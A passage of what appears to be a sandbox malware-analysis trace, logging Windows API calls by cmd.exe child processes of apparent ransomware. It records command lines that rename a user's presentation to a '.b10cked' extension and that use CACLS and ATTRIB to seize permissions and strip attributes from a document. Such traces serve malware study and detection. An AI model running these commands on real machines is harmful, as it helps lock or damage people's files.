lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x0, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegCloseKey (hKey=0x40) returned 0x0 [0234.449] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ebf4 | out: phkResult=0x22ebf4*=0x40) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x0, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x9, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x9, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x9, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegCloseKey (hKey=0x40) returned 0x0 [0234.449] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.449] srand (_Seed=0x5b8863c2) [0234.449] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"" [0234.449] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"" [0234.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.449] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.450] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.450] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.450] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.450] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.450] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.450] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.450] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.450] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.450] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.450] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.450] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.450] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.450] GetEnvironmentStringsW () returned 0x2522a0* [0234.450] FreeEnvironmentStringsW (penv=0x2522a0) returned 1 [0234.450] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.450] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.450] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.450] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.450] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.450] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.450] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.450] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.450] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.450] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f9c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.450] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f9c0, lpFilePart=0x22f9bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f9bc*="Desktop") returned 0x18 [0234.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.451] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f73c | out: lpFindFileData=0x22f73c) returned 0x24ffe0 [0234.451] FindClose (in: hFindFile=0x24ffe0 | out: hFindFile=0x24ffe0) returned 1 [0234.451] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f73c | out: lpFindFileData=0x22f73c) returned 0x24ffe0 [0234.451] FindClose (in: hFindFile=0x24ffe0 | out: hFindFile=0x24ffe0) returned 1 [0234.451] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f73c | out: lpFindFileData=0x22f73c) returned 0x24ffe0 [0234.451] FindClose (in: hFindFile=0x24ffe0 | out: hFindFile=0x24ffe0) returned 1 [0234.451] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.451] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.451] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.451] GetEnvironmentStringsW () returned 0x252ac0* [0234.451] FreeEnvironmentStringsW (penv=0x252ac0) returned 1 [0234.451] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.452] GetConsoleOutputCP () returned 0x1b5 [0234.452] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.452] GetUserDefaultLCID () returned 0x409 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb00, cchData=128 | out: lpLCData="0") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb00, cchData=128 | out: lpLCData="0") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb00, cchData=128 | out: lpLCData="1") returned 2 [0234.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.453] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.453] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.454] GetConsoleTitleW (in: lpConsoleTitle=0x2408c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.454] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.454] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.454] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.454] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.455] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.455] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.455] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.455] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.455] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.455] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.457] GetConsoleTitleW (in: lpConsoleTitle=0x22f7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.457] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.457] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.457] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.457] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.457] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.457] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.457] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.457] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.457] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.457] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.457] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.457] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.457] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.457] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.457] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.457] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.457] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.457] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.458] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.458] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.458] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.458] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.458] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.458] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.458] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.458] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.458] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.458] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.459] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f5b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f5ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f5ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.459] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.460] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.460] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.460] _wcsicmp (_String1="KC6Z~1.PPT", _String2=".") returned 61 [0234.460] _wcsicmp (_String1="KC6Z~1.PPT", _String2="..") returned 61 [0234.460] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z~1.ppt")) returned 0x20 [0234.461] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.461] SetErrorMode (uMode=0x0) returned 0x0 [0234.461] SetErrorMode (uMode=0x1) returned 0x0 [0234.461] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", nBufferLength=0x104, lpBuffer=0x22ef3c, lpFilePart=0x22ef24 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", lpFilePart=0x22ef24*="KC6Z~1.PPT") returned 0x24 [0234.461] SetErrorMode (uMode=0x0) returned 0x1 [0234.461] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0234.461] _wcsicmp (_String1="KC6Z~1.PPT", _String2=".") returned 61 [0234.461] _wcsicmp (_String1="KC6Z~1.PPT", _String2="..") returned 61 [0234.461] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z~1.ppt")) returned 0x20 [0234.461] SetErrorMode (uMode=0x0) returned 0x0 [0234.461] SetErrorMode (uMode=0x1) returned 0x0 [0234.461] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", nBufferLength=0x104, lpBuffer=0x22f3b8, lpFilePart=0x22f150 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", lpFilePart=0x22f150*="KC6Z~1.PPT") returned 0x24 [0234.461] SetErrorMode (uMode=0x0) returned 0x1 [0234.461] SetErrorMode (uMode=0x0) returned 0x0 [0234.462] SetErrorMode (uMode=0x1) returned 0x0 [0234.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x22f5c0, lpFilePart=0x22f150 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", lpFilePart=0x22f150*="kC6z.pptx.b10cked") returned 0x2b [0234.462] SetErrorMode (uMode=0x0) returned 0x1 [0234.462] SetLastError (dwErrCode=0x0) [0234.462] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx.b10cked")) returned 0xffffffff [0234.462] GetLastError () returned 0x2 [0234.462] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x22eacc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eacc) returned 0x240eb8 [0234.462] FindNextFileW (in: hFindFile=0x240eb8, lpFindFileData=0x22eacc | out: lpFindFileData=0x22eacc) returned 0 [0234.463] GetLastError () returned 0x12 [0234.463] FindClose (in: hFindFile=0x240eb8 | out: hFindFile=0x240eb8) returned 1 [0234.463] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x251ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x251ac8) returned 0x240eb8 [0234.464] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x22ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked", lpFilePart=0x0) returned 0x2b [0234.464] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx", nBufferLength=0x104, lpBuffer=0x22ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx", lpFilePart=0x0) returned 0x23 [0234.464] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx")) returned 0x20 [0234.464] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\kc6z.pptx.b10cked"), dwFlags=0x3) returned 1 [0234.464] FindClose (in: hFindFile=0x240eb8 | out: hFindFile=0x240eb8) returned 1 [0234.465] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22ed18 | out: _Buffer=" 1") returned 9 [0234.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.465] GetFileType (hFile=0x7) returned 0x2 [0234.695] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eca4 | out: lpMode=0x22eca4) returned 1 [0234.696] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.696] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ecd8 | out: lpConsoleScreenBufferInfo=0x22ecd8) returned 1 [0234.696] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0234.696] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x22ed18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0234.696] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22ecfc, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x22ecfc*=0x1a) returned 1 [0234.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.697] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.697] SetConsoleInputExeNameW () returned 0x1 [0234.697] GetConsoleOutputCP () returned 0x1b5 [0234.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.697] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.697] exit (_Code=0) Process: id = "642" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35128 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35129 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35130 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35131 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 35132 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35133 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35134 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35135 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35136 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 